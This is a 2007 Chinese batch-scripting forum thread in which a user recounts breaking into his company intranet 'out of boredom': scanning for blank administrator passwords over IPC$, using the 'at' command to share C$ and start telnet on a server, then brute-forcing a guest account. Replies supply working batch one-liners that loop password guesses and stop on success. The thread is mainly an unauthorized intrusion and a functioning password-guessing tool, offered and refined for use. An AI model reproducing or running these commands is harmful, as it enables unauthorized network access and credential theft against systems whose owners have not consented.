Board logo

标题: 如何在超大文件中寻找特定字符 [打印本页]
作者: hackerflysky     时间: 2007-6-18 01:56    标题: 如何在超大文件中寻找特定字符

出于无聊,我想测试一下公司内网的安全性

首先用ipconfig 得到本机ip :192.168.0.45然后
for /L %%g in (1 1 254) do echo %%g >>1.txt & net use \\192.168.0.%%g\ipc$ "" /user:"administrator" | find "命令成功完成'>>1.txt

运行之后,我打开1.txt
看,我惊呆了,居然有一台。

我想进一步于是:

首先建立连接:
net use \\192.168.0.212\ipc$ "" /user:"administrator"(192.168.0.212为发现的IP)

显示命令成功完成

我用net time \\192.168.0.212查看对方机器时间 显示时间于我用的一样。

我执行下一步:
net use h: \\192.168.0.212\C$显示出错,找不到网络路径

不成功,下步:

net view \\192.168.0.212


没有,下一步:

copy srv \\192.168.0.212\admin$

不成功


于是最后一步:

at \\192.168.0.212  12:00:00  net share c$ = c:\

显示命令成功完成

我想这一定是超级用户:于是给他来个:

at \\192.168.0.212  12:05:00  net start telnet

显示命令成功完成

之后,我成功TELNET 上去,发现是主机,即公司内网服务器,我呆了。

但我想,看公司前台机器安全怎么样,


一会儿得到了ip:192.168.0.55

却发现administrator 没有任何权限。无意之间在telnet
时得到一个用户名:guest


我于是想到暴力:



for /L %%g in (0 1 999999999) do echo %%g >>1.txt & net use \\192.168.0.55\ipc$ %%g /user:"guest" | find "命令成功完成'>>1.txt

运行之后我发现了一个问题:这么大的文件,怎样才能找到“命令成功完成”

我想将这个改良:
即:只将正确的密码输入到:1.txt 且马上停止运行。请高手指点


─────────────────── 版务记录 ────────────────────
执行:lxmxn
标题:求助 请高手看这个批处理
说明:因标题表述过于模糊,不便于论坛的搜索和管理,请在三日内修改标题,否则扣除2点积分
参考:http://www.cn-dos.net/forum/viewthread.php?tid=7326&fpage=1
   http://community.csdn.net/IndexPage/SmartQuestion.aspx
─────────────────── 版务记录 ────────────────────


[ Last edited by bjsh on 2007-7-31 at 02:19 PM ]
作者: lxmxn     时间: 2007-6-18 04:13

for /L %%g in (0 1 999999999) do net use \\192.168.0.55\ipc$ "%%g" /user:"guest" | find "命令成功完成" >nul && (echo Password:%%g >1.txt & exit)
作者: bjsh     时间: 2007-6-18 12:50
把 find 去掉吧 大量的 find 会 浪费时间;

直接
for /L %%g in (0 1 999999999) do net use \\192.168.0.55\ipc$ "%%g" /user:"guest" >nul 2>nul && (echo Password:%%g >1.txt & exit)
作者: diangongban     时间: 2007-6-18 20:30
for /L %%g in (1 1 254) do echo %%g >>1.txt & net use \\192.168.144.%%g\ipc$ "" /user:"administrator" | find "命令成功完成'>>1.txt

"命令成功完成' 出现find 参数不对
"命令成功完成"只扫到192.168.144.1就停了
作者: hackerflysky     时间: 2007-6-19 00:33
谢谢!
2楼3楼楼主,
能运行,只不过我将  | find "命令成功完成'>>1.txt 中的"打成 '了,改过来就行了
作者: diangongban     时间: 2007-6-19 15:06
没人回答4楼的问题啊!!!!!!!!!!!!!!!!1???
作者: zasxcdfv     时间: 2007-6-19 15:07


  Quote:
Originally posted by diangongban at 2007-6-19 03:06 PM:
没人回答4楼的问题啊!!!!!!!!!!!!!!!!1???

……看你楼上……